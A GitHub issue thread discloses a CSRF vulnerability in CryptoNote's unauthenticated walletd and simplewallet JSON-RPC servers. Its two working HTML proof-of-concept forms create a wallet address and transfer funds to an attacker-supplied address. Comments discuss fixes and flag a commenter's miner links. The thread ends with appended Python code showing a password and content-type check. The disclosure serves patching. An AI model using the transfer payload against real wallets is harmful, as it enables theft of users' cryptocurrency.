
Unauthenticated JSON-RPC API allows takeover of CryptoNote RPC wallets #172

Open
Ayrx opened this issue Feb 5, 2018 · 16 comments

Comments


Ayrx commented Feb 5, 2018

The reference implementation of CryptoNote wallets starts a JSON-RPC server
listening on a localhost port that allows an attacker to execute wallet
functions due to a lack of authentication.

An attacker may exploit this vulnerability to steal cryptocurrency from
vulnerable wallets by directing users to visit a webpage hosting the exploit.

Affected Software

All cryptocurrencies that use the reference CryptoNote walletd and simplewallet
implementations are vulnerable. Notable coins include Bytecoin and Aeon.

Description

The reference CryptoNote repository comes with two different wallets,
simplewallet and walletd. Both wallets have JSON-RPC servers that are
vulnerable to similar attacks. Even though the JSON-RPC servers are listening
on localhost, they can be exploited via CSRF.

walletd

walletd has the JSON-RPC server enabled by default. The wallet binds to port
8070 by default.

The below proof-of-concept demonstrates the vulnerability by creating a new
address in the walletd container.

<html>
<form action="http://127.0.0.1:8070/json_rpc" method="post" enctype="text/plain">
    <input name='{"params":{},"jsonrpc":"2.0","method":"createAddress", "ignore_me":"' value='test"}' type="hidden">
    <input type="submit">
</form>
</html>

simplewallet

simplewallet does not have the JSON-RPC server enabled by default. Enabling
the server requires the --rpc-bind-port flag when invoking simplewallet.

The below proof-of-concept demonstrates the vulnerability by making a transfer
from the running wallet to an attacker controlled wallet. Change the
INSERT_AMOUNT and INSERT_WALLET_ADDRESS parameters when testing the POC. We
assume that simplewallet was invoked with --rpc-bind-port 8111.

<html>
<form action="http://127.0.0.1:8111" method="post" enctype="text/plain">
    <input name='{"jsonrpc":"2.0","method":"transfer","params":{"destinations":[{"amount":INSERT_AMOUNT,"address":"INSERT_WALLET_ADDRESS"}],"fee":100,"mixin":0,"unlock_time":0}, "ignore_me":"' value='test"}' type="hidden">
    <input type="submit">
</form>
</html>

Notes on exploitation

While the proof-of-concept code assumes that the server is listening on a
specific port, changing the running port does not prevent exploitation. It is
trivial to enumerate open ports with WebSocket.

The proof-of-concept uses an HTML form to demonstrate the attack. However,
exploiting this over JavaScript is not an issue due to a lack of CSRF
protection.

Recommended Fix

The JSON-RPC servers should be patched to require authentication on every
request. It is recommended that all forks of CryptoNote and ByteCoin apply
a patch similar to the Turtlecoin fix.


FndNur1Labs commented Feb 5, 2018 via email


nnamon commented Feb 5, 2018

For those reading the above, the links are malicious and point to a coinhive miner.

Could at least bother with proper English if they wanted to scam people into browser mining for them.


FndNur1Labs commented Feb 5, 2018 via email


rainmanp7 commented Feb 6, 2018

cnhv <~ doesn't this equate to the Coinhive miner website?
Then the after-mention is your personal account, to get paid?
Does that seem like legitimate help in your mind?

@Doestoievski

@Ayrx Make a pull request.


FndNur1Labs commented Feb 6, 2018 via email

Ayrx changed the title from "Vulnerability report" to "Unauthenticated JSON-RPC API allows takeover of CryptoNote RPC wallets" on Feb 12, 2018

Ayrx commented Feb 12, 2018

As there has been no response from an official developer in 7 days, I am publishing the details of this vulnerability. A CVE ID has been requested from MITRE and will be updated here when one is assigned. The same report is duplicated at: https://www.ayrx.me/cryptonote-unauthenticated-json-rpc

@jared201

@Ayrx no patch needed, just don't bind the RPC daemon to 0.0.0.0; use 127.0.0.1 from your web wallet so no external exploitation is possible. Desktop wallets should be deprecated, they're obsolete. It's really that simple.


Ayrx commented Feb 12, 2018

@jared201 Exploitation is still possible via CSRF even if the daemon is bound only to 127.0.0.1.

@jared201

@Ayrx not really, via https, just don't allow unnecessary GET requests coming to your website directly


FndNur1Labs commented Feb 12, 2018 via email

@keylength

The 7 day disclosure window and flaming cryptonote gif are a bit much xD

@jared201

@keylength

I guess that JSON-RPC "security" issue is not really new; everyone from Monero to Bytecoin guys already knew that, except that they are silent about it.


FndNur1Labs commented Feb 13, 2018 via email

@jared201

@FndNur1Labs this issue is really serious if you're offering desktop wallets which MUST do RPC calls via public IP or FQDN. However, if you're developing web wallets, all you need is to "harden" your code by not making RPC calls from the client-side JavaScript, which most browsers will warn about or not allow you to do. Instead, you should use your JS framework's server-side RPC calls (e.g. Meteor.call() or something similar), and those RPC calls should only be connecting locally (127.0.0.1). CSRF'ing is nearly impossible, unless you allow a 'router' to do that.


FndNur1Labs commented Feb 13, 2018 via email

aphivantrakul added a commit to cash2/cash2 that referenced this issue Aug 28, 2019
Walletd JSON RPC requests did not require authentication and had the potential for an attacker to gain control of the wallet by sending JSON RPC commands to the wallet via CSRF. Users can now run the Wallet JSON RPC server with the flag --rpc-password to require that all RPC commands include a password.

Thank you to the Turtlecoin developers for their work. Much of this code is borrowed from their commit turtlecoin/turtlecoin@4949e91

More information about this vulnerability can be found here -
https://www.cvedetails.com/cve/CVE-2018-1000093/
cryptonotefoundation#172

This commit is a copy of 2 commits from the master branch of Cash2
1b9691a
f01b904
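The report's recommended fix ("require authentication on every request") and the Cash2 commit above (an `--rpc-password` flag that every RPC command must supply) amount to the same server-side check. The following Python is an added defender-side illustration, not code from the CryptoNote, TurtleCoin or Cash2 projects. It models a JSON-RPC request gate with two independent checks: the Content-Type must be `application/json`, and the request body must carry the configured password, compared in constant time. The constructed `FORM_POST_BODY` reproduces what a browser sends for the walletd proof-of-concept form (a text/plain form field is serialized as `name=value`), which shows why the original server accepted it: the `ignore_me` key absorbs the `=value` tail and the whole body is valid JSON. The function names, the header dictionary shape and the password value are assumptions made for the example.

```python
import hmac
import json

# Constructed: the body a browser sends for the walletd PoC form in this thread.
# A text/plain form field is serialized as "<name>=<value>\r\n"; the "ignore_me"
# key inside the field name swallows the "=" and the value, so the result is a
# syntactically valid JSON-RPC 2.0 object with no authentication at all.
FORM_POST_BODY = (
    '{"params":{},"jsonrpc":"2.0","method":"createAddress", "ignore_me":"'
    '=test"}\r\n'
)

# Assumed: the value an operator would pass as --rpc-password.
RPC_PASSWORD = "example-rpc-password"


def form_body_is_valid_json(body: str) -> bool:
    """True if a cross-site form body parses as JSON (the PoC body does)."""
    try:
        json.loads(body)
    except json.JSONDecodeError:
        return False
    return True


def authorize_rpc(headers: dict, body: str, rpc_password: str):
    """Decide whether a JSON-RPC request may reach wallet code.

    Returns (allowed, reason). Two independent checks:
      1. Content-Type must be application/json. An HTML form can only submit
         urlencoded, multipart or text/plain bodies cross-site, so this alone
         stops the form-based PoC, but not a non-browser client on the host.
      2. Every request must carry the configured password. This is the real
         control: it holds regardless of how the request reached the port.
    """
    # Header names are case-insensitive; drop parameters such as charset.
    lowered = {k.lower(): v for k, v in headers.items()}
    content_type = lowered.get("content-type", "").split(";", 1)[0].strip().lower()
    if content_type != "application/json":
        return False, "unsupported content type"

    try:
        request = json.loads(body)
    except json.JSONDecodeError:
        return False, "malformed JSON"
    if not isinstance(request, dict) or request.get("jsonrpc") != "2.0":
        return False, "not a JSON-RPC 2.0 request"

    # Constant-time comparison so response timing does not leak the password.
    supplied = request.get("password")
    if not isinstance(supplied, str) or not hmac.compare_digest(
        supplied.encode(), rpc_password.encode()
    ):
        return False, "missing or wrong password"
    return True, "ok"


def legitimate_request(method: str, params: dict, rpc_password: str) -> str:
    """Body a trusted local client (e.g. a GUI wallet) would send."""
    return json.dumps({
        "jsonrpc": "2.0",
        "id": 1,
        "method": method,
        "params": params,
        "password": rpc_password,
    })


if __name__ == "__main__":
    # The PoC body is valid JSON, which is why an unauthenticated server ran it.
    print("PoC body parses as JSON:", form_body_is_valid_json(FORM_POST_BODY))
    # Rejected on content type, and rejected again for lack of a password.
    print(authorize_rpc({"Content-Type": "text/plain"}, FORM_POST_BODY, RPC_PASSWORD))
    print(authorize_rpc({"Content-Type": "application/json"}, FORM_POST_BODY, RPC_PASSWORD))
    # A client that knows the configured password is accepted.
    good = legitimate_request("createAddress", {}, RPC_PASSWORD)
    print(authorize_rpc({"Content-Type": "application/json"}, good, RPC_PASSWORD))
```

Binding to 127.0.0.1, as suggested later in the thread, does not change the outcome of `authorize_rpc` for the form body: the browser of a local user is itself a local client, so the password check is what actually blocks the CSRF, and the content-type check is defense in depth against the form trick specifically.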